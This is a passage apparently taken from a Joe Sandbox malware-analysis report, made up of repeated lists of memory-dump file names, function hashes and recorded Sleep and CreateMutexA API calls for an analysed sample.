Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 9333d921478ca48764469f2d8f95ecb674ebbadb62dbb139fb6b97a83803820b
Instruction ID: 0b314b962f055e882c73e3db0390d91c7142dbaee5a8930307b5b33fd1aa9627
Opcode Fuzzy Hash: 9333d921478ca48764469f2d8f95ecb674ebbadb62dbb139fb6b97a83803820b
Instruction Fuzzy Hash: 253128716042048BEB08DF78DCC97AEF7A6EBCA314F249218E014BB3D6D775A981C751

Function 00EA9F44 Relevance: 3.1, APIs: 2, Instructions: 137
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 3b4592c269df28cc3aa7e8391c22bc85c14e252aaa256ff53630b1e42d0a3dac
Instruction ID: a808ea017d5fc664ce3ae29a148e52e134dbb9da0e8c65fdc94afaa586429f06
Opcode Fuzzy Hash: 3b4592c269df28cc3aa7e8391c22bc85c14e252aaa256ff53630b1e42d0a3dac
Instruction Fuzzy Hash: B83115317042048BEB18DB68DCC47ADB7A2EBCA314F249628E014FB2D5D776A980C652

Function 00EAA079 Relevance: 3.1, APIs: 2, Instructions: 136
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: cc64e95aadd6bd1c5f116faff4e1d903b74597e08f79243a4288485c6a870afe
Instruction ID: 8f44670df8c7af137eee687648c642f3e2670e75c91041e8701e80fe53f39b66
Opcode Fuzzy Hash: cc64e95aadd6bd1c5f116faff4e1d903b74597e08f79243a4288485c6a870afe
Instruction Fuzzy Hash: E7314A716003049BEB18DF78DCC4BADB7A3EBCA314F289228E014BB3D5D7766980C612

Function 00EAA1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 877ec0beabb8acc7a89d3dac1af143dc9c51f211cf2b3427a643f70d44a4fd30
Instruction ID: 7699710dfd64425e08ddbefaa9cf63827bba6f766855f78bcc96209a82902cb2
Opcode Fuzzy Hash: 877ec0beabb8acc7a89d3dac1af143dc9c51f211cf2b3427a643f70d44a4fd30
Instruction Fuzzy Hash: DA312B716042009BFB18DF68DCC97ADB762EBCB314F285629E014BB3D5D7766980C622

Function 00EAA418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174284674.00000000010C2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174306209.00000000010C4000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174335919.00000000010D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174368576.00000000010F5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174396132.00000000010F8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174423830.00000000010FF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174446532.0000000001101000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174468261.0000000001102000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174490509.0000000001108000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174514592.0000000001109000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174531694.000000000110C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174554638.0000000001114000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174577278.0000000001117000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174598717.0000000001118000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174619988.000000000111A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174641557.000000000111C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174687467.0000000001122000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174737893.000000000112A000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174761042.000000000112C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174788334.000000000112D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174815991.0000000001135000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174838853.0000000001143000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001144000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174860944.0000000001176000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175101961.000000000118C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175125720.000000000118D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175153056.00000000011A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175178147.00000000011A6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175201515.00000000011A7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175225421.00000000011AD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175247335.00000000011AF000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175271959.00000000011BE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2175294244.00000000011BF000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_file.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 7ef303e3548be89b92a58400cc1f7e88a31249cf9c4fe751f6136205afe62e0f
Instruction ID: f36656492b3c2c2ca1f40c3e746623caff494ffa5034141e258283d86d84578b
Opcode Fuzzy Hash: 7ef303e3548be89b92a58400cc1f7e88a31249cf9c4fe751f6136205afe62e0f
Instruction Fuzzy Hash: 42312D3160430097EB08DBB8DCC97ADF7A2EFCA314F285229E014BB3D5D7756980C652

Function 00EAA54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32(00000064), ref: 00EAA963
CreateMutexA.KERNEL32(00000000,00000000,00F03254), ref: 00EAA981

Memory Dump Source

Source File: 00000000.00000002.2173789763.0000000000EA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2173768313.0000000000EA0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173789763.0000000000F02000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173858005.0000000000F09000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173878938.0000000000F0B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173903933.0000000000F15000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173924361.0000000000F16000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2173944717.0000000000F17000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174059121.0000000001073000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174079957.0000000001076000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.0000000001084000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174108955.000000000108F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174155630.000000000109C000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174179966.000000000109D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174203143.00000000010A5000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174226272.00000000010AC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2174259544.00000000010BF000.00000080.00000001.01000000.00000003.sdmpDownload File
